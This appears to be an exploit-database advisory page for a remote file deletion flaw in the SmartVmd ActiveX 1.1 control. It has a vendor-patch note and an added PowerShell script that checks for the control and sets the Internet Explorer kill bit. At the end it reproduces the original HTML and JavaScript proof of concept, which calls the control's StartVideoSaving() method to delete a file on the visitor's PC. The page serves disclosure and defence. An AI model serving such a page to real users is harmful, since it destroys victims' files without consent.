Vendor: SmartVmd ActiveX V 1.1
By: Houssamix
CVSS: 9.3 (HIGH)
Remote File Deletion
CWE: 284
Product Name: SmartVmd ActiveX V 1.1
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:smartvmd:smartvmd_activex_v1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

SmartVmd ActiveX V 1.1 remote file deletion exploit

SmartVmd ActiveX V 1.1 is vulnerable to a remote file deletion exploit. The insecure StartVideoSaving() method allows attackers to delete files on the victim's PC. The exploit code is written in JavaScript and is triggered by clicking a button.

Mitigation:

The vendor has released a patch to address this vulnerability.
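
A check that complements the vendor patch, as an added example (not from the original advisory or the vendor): the PowerShell below reports whether the control is registered and whether the Internet Explorer kill bit is set for the CLSID used in the proof of concept's object tag, and sets the kill bit when run with -Apply. The -Apply switch and the function names are this example's own, and it assumes the control registers as an in-process COM server; the registry location and the 0x400 flag are the standard ActiveX Compatibility kill-bit mechanism.

```powershell
# Added example, not part of the original advisory. Run elevated to use -Apply.
param([switch]$Apply)   # without -Apply the script only reports

$Clsid     = '{E3462D53-47A6-11D8-8EF6-DAE89272743C}'  # from the <object> tag on this page
$ValueName = 'Compatibility Flags'
$KillBit   = 0x400      # kill bit: Internet Explorer refuses to load the control

# Native registry view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Views = @('HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node') | Where-Object { Test-Path $_ }

function Get-ControlState {
    param([string]$View)
    $compat = Join-Path $View "Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    # Assumption: the control is an in-process server (InprocServer32).
    $server = Join-Path $View "Classes\CLSID\$Clsid\InprocServer32"
    $flags  = (Get-ItemProperty -Path $compat -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
    $binary = (Get-ItemProperty -Path $server -ErrorAction SilentlyContinue).'(default)'
    [pscustomobject]@{
        View       = $View
        Registered = [bool]$binary          # true when the COM server path is present
        Binary     = $binary
        Flags      = if ($null -ne $flags) { '0x{0:X8}' -f $flags } else { '(not set)' }
        Blocked    = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
    }
}

function Set-KillBit {
    param([string]$View)
    $compat = Join-Path $View "Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    if (-not (Test-Path $compat)) { New-Item -Path $compat -Force | Out-Null }
    $current = (Get-ItemProperty -Path $compat -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
    # OR the bit in so compatibility flags that are already present are preserved.
    Set-ItemProperty -Path $compat -Name $ValueName -Value ([int]$current -bor $KillBit) -Type DWord
}

foreach ($view in $Views) {
    if ($Apply) { Set-KillBit $view }
    Get-ControlState $view   # one row per registry view: Registered, Flags, Blocked
}
```

A host where Registered is True and Blocked is False still exposes the control to web content until the patch or the kill bit is in place.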

Exploit-DB raw data:

<HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

   	SmartVmd ActiveX V 1.1 remote file deletion exploit    <br/>

	download : http://www.smartvmd.com/setup/SetupActiveXVmd.msi  <br/>

	Note : StartVideoSaving() insecure method allowed us to delete files on the victim's PC  <br/>

</b>


<object id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}"></object>

<SCRIPT>
/*

Report for Clsid: {E3462D53-47A6-11D8-8EF6-DAE89272743C}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller  

*/
function hehe()
 {
     File = "c:\\hsmx.txt"
   hsmx.StartVideoSaving(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-19]